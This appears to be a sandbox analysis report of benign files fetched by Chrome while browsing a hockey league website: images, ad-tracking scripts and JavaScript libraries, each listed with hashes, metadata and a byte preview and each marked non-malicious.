                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 240x240, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=10, manufacturer=Canon, model=Canon EOS 5D Mark IV, xresolution=162, yresolution=170, resolutionunit=2, software=Adobe Lightroom 8.0 (Macintosh), datetime=2024:11:07 11:51:13], baseline, precision 8, 730x487, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):78473
                                                                                                                          Entropy (8bit):7.759847390549481
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:njfMB6rbYI6YWbn6x42BlXLhdJAKCJVFynzh8fF8NbvVt/ps:nrP6bV27DJADJfUhVBvBs
                                                                                                                          MD5:680A0FDAD729FEC37C86C09D7B72256C
                                                                                                                          SHA1:CF86D3291A4F56694955FBCF4718235B237AA32D
                                                                                                                          SHA-256:8A359781A14C3FF1F0B749B4443926EF8B63596D96098B8DDB6A41DD821DCB75
                                                                                                                          SHA-512:A1E86D182F5FC05AB678588C2EA4836F8BE15E074432F312266962BEF1EE9ABA1BDCB828F794A7C0C34BDAA61D791ECE94BF9CD9C4E5C49E58460728A6776875
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF............2vExif..II*.......................................................(...........1... .......2...........;.......................i...........d...Canon.Canon EOS 5D Mark IV..................Adobe Lightroom 8.0 (Macintosh).2024:11:07 11:51:13.ALEX TE.ALEXJSTE..!........................."...........'...........0...........2...................0231........................................................................................................................................................00..........00..................................................................................................1...........2....... ...4.......@...5.......X.......................2024:11:02 12:37:01.2024:11:02 12:37:01.-05:00..-05:00..-05:00..X.y.@B...T-.@B..................F.........f......\D.....192156000129..........F.......................EF24-70mm f/2.8L II USM.1517002438........................................(...............................................................
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 149729
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):53773
                                                                                                                          Entropy (8bit):7.994997808032353
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GaYTyqDEKWBpySlghXEP7rren3O+uVRivdamt0DdaNhaFqwiezs1YC:GNHgpySy2Pa+HriQmt0ZaNuiezs2C
                                                                                                                          MD5:BB6F1FA47AC6034BC9EF9AD1D360B0CD
                                                                                                                          SHA1:5F46C93A4D024F8BC4A02A3D0B1DAC9FE5CE70C3
                                                                                                                          SHA-256:1E356ECD17C2F81E067C1892B178B0D94F42C5B9820578A32F2B94C32F1ABF3A
                                                                                                                          SHA-512:A89D0B564DA3C75D8DF3E9088CC7C1FF875F4643D237C374B4EF5F2DC69DB36611C5FA3D0FF00BA33DEDAB090EAF24AC35BA394C047740D08383048FB14BD395
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://content.jwplatform.com/libraries/hjrgzdkB.js?ver=4.5.3
                                                                                                                          Preview:............z...(..<...K..A-Rw5..H.Vb[.%;.e-.I.d[d7....y.y..w^l.../..d.|3;^Kl.B.PU(....Ok..V...G.....q.N.I...Cgg...N4{...8...vm...+...v<..^crR{-.........I-.../k.h k~8...)K.{.$i....[.Y..4..cYKe<M."...A...Z4.d.6..}.7.5..!V:....0u..8Mg...u...|..Qg.~4.J.d.tp.G......$.H..b.N...0.az....E1.=.`...b&.z"j....d.... ....[w[..0J...~I..O[.....x..5)R.y..G.n..1.B.!.....A=...\,.....'Ik....`.. .....L..$]....j...\.D../_,..$...UA..%`n...?..........?.rK....A....W....7._.......eb...|z.......m03%/!.}U].4.#&X...1....b.AK.. ..b...@,.j..4.4.D/..el.......3....o..Cx.%rP..3B.....o...Q...=....0.r).......~.S[........>....G.....T.......(.z(S.rU....S.)/3.}.......at...`.m...YQ...yx.G....2....PN..=.[(.....6...jp.H:..]..?k..X....4........C<.H\.2.%6.......b'U.pJ.......Q.X..!O.E........A..S...E.6...@/&...0].`.F..../Az.$ ....q.B..GXbXH,.a..... }`..........5..AG...,.......i......f...DD)..........u1...q(.... .........d.M.~.Y....!..-^X...T...S.p$.k..dD7...? U..y..`..Y.a]......D.....j....5..@.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):1042159
                                                                                                                          Entropy (8bit):4.231895774513777
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:eoZwZSWw6WwPzZzWnfMw35nfMw3HGTKGTTwQIBnuq0:DZ6ZPNqfMw35fMw3HGTKGTTwQINu3
                                                                                                                          MD5:E025AE7BF313E81E694D8BBC66A9A5F0
                                                                                                                          SHA1:767FB761D73E4A5EA71F956B00B1448566C10D61
                                                                                                                          SHA-256:25B2E5F2ECA32F809C43647D70B02903C9BADB15E3E3C85A5651411B21C258E5
                                                                                                                          SHA-512:0D360321FDED449A1AC33FD337238C1E47DE1255594DFC3797819F1A0AF97AD6112D859C72463BC46254279884C5C1715B8628BB886CDE2C5890499C49A310FE
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.googletagservices.com/agrp/prod/model_person_country_code_US_person_region_code_56415f353131.json
                                                                                                                          Preview:{"b": {"d": {"a": false, "b": [{"a": 6, "d": [{"a": 2, "b": 30, "c": 4}, {"a": 7, "d": [{"a": 2, "b": 29, "c": 1}]}]}, {"a": 2, "b": 30, "c": 4}, {"a": 8}], "c": [{"b": true, "c": 1.32, "e": 0, "f": 0.0, "g": 1.0, "h": 1.0, "i": 1.0}, {"b": true, "d": 1.32, "e": 0, "f": 0.0, "g": 1.0, "h": 1.0, "i": 1.0}, {"b": false, "c": 1.0, "d": 1.0, "e": 0, "f": 0.0, "g": 0.0, "h": 0.0, "i": 0.0}]}, "g": {"e": {"c": {"d": "country_region_assignment", "a": false, "c": {"d": {"j": "US", "l": "US", "k": "VA_511"}}}}, "g": {"c": {"d": "YEU8xvohOXL", "e": {"b": true, "l": true, "w": true, "v": true}, "a": true, "b": [{"a": {"l": "US", "b": true, "v": 0, "w": true}, "d": {"h": 0.9288749219655741}}, {"a": {"l": "US", "b": true, "v": 1, "w": true}, "d": {"h": 0.9288749219655741}}, {"a": {"l": "US", "b": true, "v": 2, "w": true}, "d": {"h": 0.8137352721797373}}, {"a": {"l": "US", "b": true, "v": 3, "w": true}, "d": {"h": 0.8137352721797373}}, {"a": {"l": "US", "b": true, "v": 4, "w": true}, "d": {"h": 0.81
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 57x57, segment length 16, baseline, precision 8, 730x410, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):93722
                                                                                                                          Entropy (8bit):7.96536294250091
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:KpEbKRv6lhJ+9+4f2B81b698ue9qoFxrEuzIOc1skjfGLqz+ekhfrf1n7:/uC7J+9+4U8s98VjHIOc1XGLqGhfrt7
                                                                                                                          MD5:3C6DC49970F3CC5916494CD761497389
                                                                                                                          SHA1:A4DD445CFE7437F226274A93F0BE78503BF3B8B2
                                                                                                                          SHA-256:421A65F008582C07F8CE9084CC6D8CF0D64CA18CF7BE377ECEDBFEA3658281D1
                                                                                                                          SHA-512:903E8B1586EA48B2D383CF0D3988ED13EA07DC25381773D1EAA15A113CCF42384A0E79CF17123F164FD332788864DC3AC8E07FB85C81083C572FEC2825B86C62
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/12/10213839/Screenshot-2024-12-10-at-9.32.59-PM-730x410.jpg
                                                                                                                          Preview:......JFIF.....9.9......ICC_PROFILE.......appl....mntrRGB XYZ ...........-acspAPPL....APPL...........................-appl................................................desc...P...bdscm........cprt...P...#wtpt...t....rXYZ........gXYZ........bXYZ........rTRC........aarg....... vcgt.......0ndin... ...>mmod...`...(vcgp.......8bTRC........gTRC........aabg....... aagg....... desc........Display.................................................................................mluc.......&....hrHR........koKR........nbNO........id..........huHU........csCZ.......0daDK.......FnlNL.......bfiFI.......xitIT........esES........roRO........frCA........ar..........ukUA........heIL........zhTW.......$viVN........skSK.......<zhCN.......$ruRU...$...RenGB.......vfrFR........ms..........hiIN........thTH........caES........enAU.......vesXL........deDE........enUS........ptBR........plPL......."elGR..."...4svSE.......VtrTR.......fptPT.......zjaJP.........L.C.D. .u. .b.o.j.i.... .L.C.D.F.a.r.g.e.-.L.C.D.L.C
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 730x411, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):24312
                                                                                                                          Entropy (8bit):7.8774288767841965
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:qmw2DeFLgLkE1IDzM2B8EEVYA6zH7wCMyiC6noT3YyQsxocLPpo5l:qmk3E1IDYR6AgH7wCXiCt7h/xocLPpml
                                                                                                                          MD5:F69CC52CD81A54B5012B2ADA2461726B
                                                                                                                          SHA1:EAE1A1B9979442EB8B89E4A6CC1566B4FCF9E06F
                                                                                                                          SHA-256:87444690369A822142419685C427E194225E0CEC1B2F1B7B93FCBBF06ADDB4DF
                                                                                                                          SHA-512:ED3DDBEBDAE6314080087D57F0140BFE64398122BCEE89D7F6608FDD49942600FB65D9862B27A5D29BE137ECC64784FF8B66FFF3573EF9E254D929504DC5A419
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C............................................................................".........................................[...........................!1.."AQa..2q..#RSb..B...3CUr......$7DTu.%46s......&'58EWt..ce..................................E........................!..1AQaq."2.....B..R..#.....5F..$3DSb..................?...D@...DD....D@...DD....D@...DD....D@...DD....D@...DD....D@...DD....D@...DD....B@.$.;.%.3....B.J(>.....}m...@ME....Q..%.i...@LE.......w..-._Y.}g~..R}..%.%.q_H..."...gr..4.T\.....}.r.""...." ...""...." ...""...." ...""...." ...""...." ...""...." ...""...." ...""...." ...""...." ..."".....<.....+........Q<.W..F;9.G.@p.*k..h8...R.....!'.p.]<...F..>%d@F..O...\z.....T.@E.e/.w.\z....5-u.F\X$n.....oU.x...U7...LD./US.w........,.\ ..7o.9..c.......p@`6...w.u6..3..C..G. *.j.o.....^.....|.U. *....q.sVx..?..G.J.Z..9....%.,...>-....e4.....fU.ZO8..9`.}.......*.n....j..D3...
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):838
                                                                                                                          Entropy (8bit):4.670822471754643
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:2b7Ksen60AfVXF2ACfiVSApbE3zWlSabWH:C0A1gfMhG36YkWH
                                                                                                                          MD5:49CEA0A781874A962879C2CACA9BC322
                                                                                                                          SHA1:72C1650DE2B93EF320D2DB873FBB473FE360269C
                                                                                                                          SHA-256:57A50C99A31EF4E89E86664E96F6DFBDDE163A2EB96E88B3B492C49AA4BE2F37
                                                                                                                          SHA-512:7EBF5DA4637794CDAB0D199E8B0550E9230A1550804A4CE7FC723A8881E16D12327B9C40BCEECFF54ECE29DDE71BF41E63E8510ADF0827C4CD13C2392E6250A6
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:(function( $ ) {..'use strict';.../**.. * All of the code for your public-facing JavaScript source.. * should reside in this file... *.. * Note: It has been assumed you will write jQuery code here, so the.. * $ function reference has been prepared for usage within the scope.. * of this function... *.. * This enables you to define handlers, for when the DOM is ready:.. *.. * $(function() {.. *.. * });.. *.. * When the window is loaded:.. *.. * $( window ).load(function() {.. *.. * });.. *.. * ...and/or other possibilities... *.. * Ideally, it is not considered best practise to attach more than a.. * single DOM-ready or window-load handler for a particular page... * Although scripts in the WordPress core, Plugins and Themes may be.. * practising this, we should strive to set a better example in our own work... */..})( jQuery );.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):70274
                                                                                                                          Entropy (8bit):4.339041568655532
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:7BezcHmrlGI2R8mhNibroDyFDJAlqCIWglOo:FezcHgGI2R8mhNibroDyFDJAl9o
                                                                                                                          MD5:9003CE006332652CA6790949AF7C4C9D
                                                                                                                          SHA1:A7A2FE3A7F0064BA259862D9A5AA0907A7BABD23
                                                                                                                          SHA-256:57D77C8CA1EF7313363B200848555760678E8E85CF356248F5C67180212022C5
                                                                                                                          SHA-512:126FDACF49D4A689F83B4B12DBB609718020BA8C73FD4C81923252AE1896B3720C1506CEF18DF7B467CA8BFC061AF6DA230340A9A59C63E4C5DCCF6CADC97DA6
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://gthlcanada.com/app/themes/base/assets/scripts/js/slick.js
                                                                                                                          Preview:/*. _ _ _ _. ___| (_) ___| | __ (_)___./ __| | |/ __| |/ / | / __|.\__ \ | | (__| < _ | \__ \.|___/_|_|\___|_|\_(_)/ |___/. |__/.. Version: 1.5.0. Author: Ken Wheeler. Website: http://kenwheeler.github.io. Docs: http://kenwheeler.github.io/slick. Repo: http://github.com/kenwheeler/slick. Issues: http://github.com/kenwheeler/slick/issues.. */./* global window, document, define, jQuery, setInterval, clearInterval */.(function(factory) {. 'use strict';. if (typeof define === 'function' && define.amd) {. define(['jquery'], factory);. } else if (typeof exports !== 'undefined') {. module.exports = factory(require('jquery'));. } else {. factory(jQuery);. }..}(function($) {. 'use strict';. var Slick = window.Slick || {};.. Slick = (function() {.. var instanceUid = 0;.. function Slick(element, settings) {.. var _ = this,. dataSettings, responsiveSettings, breakpoint;
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (1055)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):2690
                                                                                                                          Entropy (8bit):5.398083497267717
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:Otg7xNqHIN7QaE9Fa9FZpPiNmgrZyHicju8m5I0zRHkFRCmTx:rN7Qabhiwdicju8WhRHMnTx
                                                                                                                          MD5:2669D16AAE166D157B8434762A199620
                                                                                                                          SHA1:CA7E08D45D0D469ED57825C28CB214F421311F97
                                                                                                                          SHA-256:944A37F694B55DE268A0BF52DBAE4E12F12C4AE09EE5C8D213BA05075C2865DD
                                                                                                                          SHA-512:51CCCC87145F0B0098B81BEA1506C726BB249E65F3B5FCC853F1FC4D4E55716F1F9318E43A2A0B31DFC4C968C14EBAF1EEFB9331C6DCE1B561459883DA7E9432
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://tpc.googlesyndication.com/pagead/js/r20250109/r20110914/client/window_focus_fy2021.js
                                                                                                                          Preview:(function(){'use strict';function f(a,b,e){a.addEventListener&&a.addEventListener(b,e,!1)};/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .function g(a,b,e){if(Array.isArray(b))for(let c=0;c<b.length;c++)g(a,String(b[c]),e);else b!=null&&e.push(a+(b===""?"":"="+encodeURIComponent(String(b))))};function l(a=document){return a.createElement("img")};function m(a,b,e=null,c=!1){n(a,b,e,c)}function n(a,b,e,c){a.google_image_requests||(a.google_image_requests=[]);const d=l(a.document);if(e||c){const k=h=>{e&&e(h);if(c){h=a.google_image_requests;const v=Array.prototype.indexOf.call(h,d,void 0);v>=0&&Array.prototype.splice.call(h,v,1)}d.removeEventListener&&d.removeEventListener("load",k,!1);d.removeEventListener&&d.removeEventListener("error",k,!1)};f(d,"load",k);f(d,"error",k)}d.src=b;a.google_image_requests.push(d)};function p(a=null){return a&&a.getAttribute("data-jc")==="22"?a:document.querySelector('[data-jc="22"]')};var q=document,r=window;functi
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):2228
                                                                                                                          Entropy (8bit):7.82817506159911
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                                                                                                          MD5:EF9941290C50CD3866E2BA6B793F010D
                                                                                                                          SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                                                                                          SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                                                                                          SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.gstatic.com/recaptcha/api2/logo_48.png
                                                                                                                          Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (25994)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):105016
                                                                                                                          Entropy (8bit):5.484001013736656
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:NgbBLvm3z5g5NrK8M0KQslzVGMc+H53XSXRStHBV9JFwq4I4Ndc2ooofEHnOo3+:8drKthVAanSBStHBHEq4IKc2RjO
                                                                                                                          MD5:CFFAE5DB73D38C1FCAC697B3369B61F9
                                                                                                                          SHA1:BA03D447B8930340ECF2BFBEEBC0D802C1ACB330
                                                                                                                          SHA-256:017C5A3795B5230C4C6C3F4A8802FCAABB647C2DA748E9ECDD06CB128900ABB4
                                                                                                                          SHA-512:7C208BEEB41B60CC93ECCA24ECB8FAC81F1C3185952D6BA3082BE3DCA3E0550AE6D0B0573BAFDF789D139A7FCEDE6C345868EA397F6D2DA68EDBE37C9BFF9B9B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://securepubads.g.doubleclick.net/static/topics/topics_frame.html
                                                                                                                          Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="UTF-8" />. <title>Topics Frame</title>. <meta. http-equiv="origin-trial". content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=". />. <script>. ./*.. Copyright 2022 Google LLC. SPDX-License-Identifier: Apache-2.0.*/.var m,aa,ba=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ca=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},da=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):600
                                                                                                                          Entropy (8bit):7.391634169810707
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:6v/7OEUT9vceKKNtY3kM8O+mucROzZbJOAjPBE2Iq8AnxT9:bTdcVIM8tfHzzjy2IdKT9
                                                                                                                          MD5:0F2A4639B8A4CB30C76E8333C00D30A6
                                                                                                                          SHA1:57E273A270BB864970D747C74B3F0A7C8E515B13
                                                                                                                          SHA-256:44B988703019CD6BFA86C91840FECF2A42B611B364E3EEA2F4EB63BF62714E98
                                                                                                                          SHA-512:3EA72C7E8702D2E9D94B0FAA6FA095A33AB8BC6EC2891F8B3165CE29A9CCF2114FAEF424FA03FD4B9D06785326284C1BB2087CE05E249CCAC65418361BFA7C51
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX..M+.Q.....&/....&......6...|.I..).o.I.X..#.@.bb.D.'5....m...=..y........{....<.P..;.H......f...3l...M.I...j2.....3..1x..S......9..<m...E.'F'.. ...M.j...C..c.5.-..F..3H./F!.."V.e.i.}.Y....../.rw...@...].rp...`CQo(.....J...u.".!E...$.^$...k....b...*.@.^.;.u5.*.......H/Q{..$..'..........w...r.+xS.uR..J.......GD.O./.. G7..l...J.t.3.S...N.7...e..s.-Jlj)..5E....E.;8w4.k..=.li.G...1.c....p,T6;....1.oW.%.2,..Z..a...*m.s}T1F....Hr.1......<x0.....-.i......IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 730x411, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):71079
                                                                                                                          Entropy (8bit):7.9733944347586325
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:cmnflmkIdqSxo+1hm+3hX56OwPijWIQyFde9L2l1N7djb:bEQS91hmyhX4OMXIdF4crb
                                                                                                                          MD5:4B609D04EBE6CE1BEBB6D4708144D110
                                                                                                                          SHA1:0247776CCF9DB481574269F9F57BFC4977AD9957
                                                                                                                          SHA-256:51BADEE0F21648A86400A9C5765B6FA704A42A43891C83047486A832BB6527CF
                                                                                                                          SHA-512:E744BD5E27113496A77E4946D345807AD0BFF944ABBC695E446C9632901341D69158808B198AD635C08A1DC526BFADB929B500C980AEE9CEA0AA5A5A469FB1AC
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/12/02164945/AROUND-THE-G-TITLE-November-2024-730x411.jpg
                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C............................................................................"..........................................`.........................!..1A..Qa."q.2...#BR...3b...$Cr..Ss....%46Ddv.....&58ETc....'9tw.....................................D.......................!1...AQ."2aq..........#3B.R...4Cr....$Sbc..............?...u=...0.o5..v..h.z.......$.I=.g.....e.-.Hq.PNI.W}..MF..K.o.f..u..+}.E.b.H...~D.....)%X.mIH.F....H..5...y.%...`$....V...6....C|\.....n..A.......Pu...V.z.k.W).'..?..P..F...XF....8...0>.[K.s..eD..!=..|.j.4...j..G..J........T.....En.pi..ZB....g.j]Ot....0..l7..5...E....RP.w......^b.m.U.W;....,...|...E6.....I(..?v.....sn0.g3.9.J.m.R..JH...a.NV.].V.>.v..a$...n.n>."..q.TW.`..H.N.....:.D.WM...a..c.`f..7... .>[l!.Ej.....6..[.iC.;........E.k....8..HkNY...R.+H..~.Bj..lq.9Q%G..........a.*.4..l....f.b].S.B......`v..R......Z.m...,..g....!....<-$U..Tul.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):42
                                                                                                                          Entropy (8bit):2.9881439641616536
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                          MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                          SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                          SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                          SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:"https://pagead2.googlesyndication.com/pcs/activeview?xai=AKAOjsvkeXUriSADSsaDAdL-HfHg-sPtZ6ByPr8JeRvSG_OUOfIWA2ce0cN1HxDa_lUtyEOoMuef4-JloQtAnedxwkOMkBx_PULvlxJviyN_jh-q5aQ3fQj7u1_ct0yjDjynGdl3hY7jKEC2Eqs-iHmqZRuVslLNKZvuQDcgOuczkJiP51JzZxn3NTvYHo2iQeJ7IjAhEA&sig=Cg0ArKJSzGPxhJZuA4q4EAE&id=lidar2&mcvt=1003&p=276,587,366,1315&tm=1006.5&tu=3.600000001490116&mtos=1003,1003,1003,1003,1003&tos=1003,0,0,0,0&v=20241204&bin=7&avms=nio&bs=1903,953&mc=1&vu=1&app=0&itpl=3&adk=3145876704&rs=4&la=0&cr=0&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTI4LjAuNjYxMy4xMjAiLG51bGwsMCxudWxsLCI2NCIsW1siQ2hyb21pdW0iLCIxMjguMC42NjEzLjEyMCJdLFsiTm90O0E9QnJhbmQiLCIyNC4wLjAuMCJdLFsiR29vZ2xlIENocm9tZSIsIjEyOC4wLjY2MTMuMTIwIl1dLDBd&vs=4&r=v&co=3273488300&rst=1736802082693&rpt=1244&isd=0&lsd=0&met=mue&wmsd=0&pbe=0&fle=0&vae=0&spb=0&sfl=0&ffslot=0&reach=8&io2=0"
                                                                                                                          Preview:GIF89a.............!.......,...........D.;
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):600
                                                                                                                          Entropy (8bit):7.391634169810707
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:6v/7OEUT9vceKKNtY3kM8O+mucROzZbJOAjPBE2Iq8AnxT9:bTdcVIM8tfHzzjy2IdKT9
                                                                                                                          MD5:0F2A4639B8A4CB30C76E8333C00D30A6
                                                                                                                          SHA1:57E273A270BB864970D747C74B3F0A7C8E515B13
                                                                                                                          SHA-256:44B988703019CD6BFA86C91840FECF2A42B611B364E3EEA2F4EB63BF62714E98
                                                                                                                          SHA-512:3EA72C7E8702D2E9D94B0FAA6FA095A33AB8BC6EC2891F8B3165CE29A9CCF2114FAEF424FA03FD4B9D06785326284C1BB2087CE05E249CCAC65418361BFA7C51
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.gstatic.com/recaptcha/api2/refresh_2x.png
                                                                                                                          Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX..M+.Q.....&/....&......6...|.I..).o.I.X..#.@.bb.D.'5....m...=..y........{....<.P..;.H......f...3l...M.I...j2.....3..1x..S......9..<m...E.'F'.. ...M.j...C..c.5.-..F..3H./F!.."V.e.i.}.Y....../.rw...@...].rp...`CQo(.....J...u.".!E...$.^$...k....b...*.@.^.;.u5.*.......H/Q{..$..'..........w...r.+xS.uR..J.......GD.O./.. G7..l...J.t.3.S...N.7...e..s.-Jlj)..5E....E.;8w4.k..=.li.G...1.c....p,T6;....1.oW.%.2,..Z..a...*m.s}T1F....Hr.1......<x0.....-.i......IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 680x510, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):78608
                                                                                                                          Entropy (8bit):7.982059281911854
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:wzdsHguEYadFeT4+AwEIoNOKNONQIYB/e9Wb+IvH/0XUA:5XliOs8BE/Uqf6UA
                                                                                                                          MD5:EC25209AA570C7C90CE92C1DAB6E4D28
                                                                                                                          SHA1:570B6B52D598D5A41DBB3A423D20EE7506A19209
                                                                                                                          SHA-256:4E18CF2E42D8C10695D916BE37406983564926C5CBD490E795305CEADF263D74
                                                                                                                          SHA-512:1ED09FE29FA933F31FD33A810E98F4132FB22A183F28177E54458DFA5EC3E9F38DC89BF7DA2CA1DE5AB94481E4358533A50E14815F6AB444485AA6D89095208C
                                                                                                                          Malicious:false
